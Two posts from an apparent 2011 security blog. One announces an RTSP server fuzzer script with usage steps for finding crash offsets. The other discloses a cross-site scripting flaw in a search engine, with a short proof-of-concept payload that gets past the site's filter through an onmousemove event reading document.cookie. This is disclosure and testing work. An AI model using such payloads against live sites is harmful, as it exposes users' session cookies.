Sunday, November 20, 2011

rtspFUZZ a Real Time Streaming Server Fuzzer

The Real Time Streaming Protocol (RTSP) is a network control protocol designed for use in entertainment and communications systems to control streaming.The Real Time Streaming Protocol, or RTSP, is an application-level protocol for control over the delivery of data with real-time properties. RTSP provides an extensible framework to enable controlled, on-demand delivery of real-time data, such as audio and video.

rtspFUZZ is a Real Time Streaming Protocol Server Fuzzer(a python script near about 600 lines)coded by myself.
This fuzzer uses 6 basic crafting and 9 advanced crafting technique to test any target application.

Key Features:
1)This fuzzer uses 6 basic crafting technique with OPTIONS,DESCRIBE,SETUP,PLAY,GET_PARAMETER,TEARDOWN,PAUSE etc rtsp commands and 9 advanced crafting technique to test any target application.
2)Ability to fuzz with Metasploit Pattern (pattern_create.rb) can be helpful to find offset.

How to use??
1)First edit "rtsp.conf" file with your favorite text editor.Change the Parameters as per your requirement.You should get parameters description in the configuration file.
2)Give Write permission to LOG.TXT (chmod 777 README.TXT)
3)Give execution permission to "" file.(chmod 777
4)In shell type "python".Now the script will show your preferences provided in the configuration file.If the information are correct then press enter to start fuzzing.
5)The program will always save the last successful request in LOG.TXT file.When the target crashes go to LOG.TXT file to check the Buffer length and the exact request sent.

Some sample wire-shark captures:


The tool can be downloaded from:

XSS through javascript injection in Speed-Bit Search Engine

There is a XSS through JavaScript Injection vulnerability in the Home page of Speed Bit Search Engine.

In Media:
The Hackers News:
Softpedia News:

Technical Description of this Issue:
The XXS filter is filtering normal html /script /iframe tags but XXS can be achieved by injecting JavaScript event "onmouseover()".

Proof of concept:
To exploit this vulnerabilty follwthis steps:

1) Visit this URL" onmousemove="alert(document.cookie)

2) Bring mouse cursor over the hyperlink shown in the attached POC! and you should see a POP up box showing the browser cookies.

The search engine might not be as popular as Google, but a large number of users could be affected if a black hat would profit from the flaw.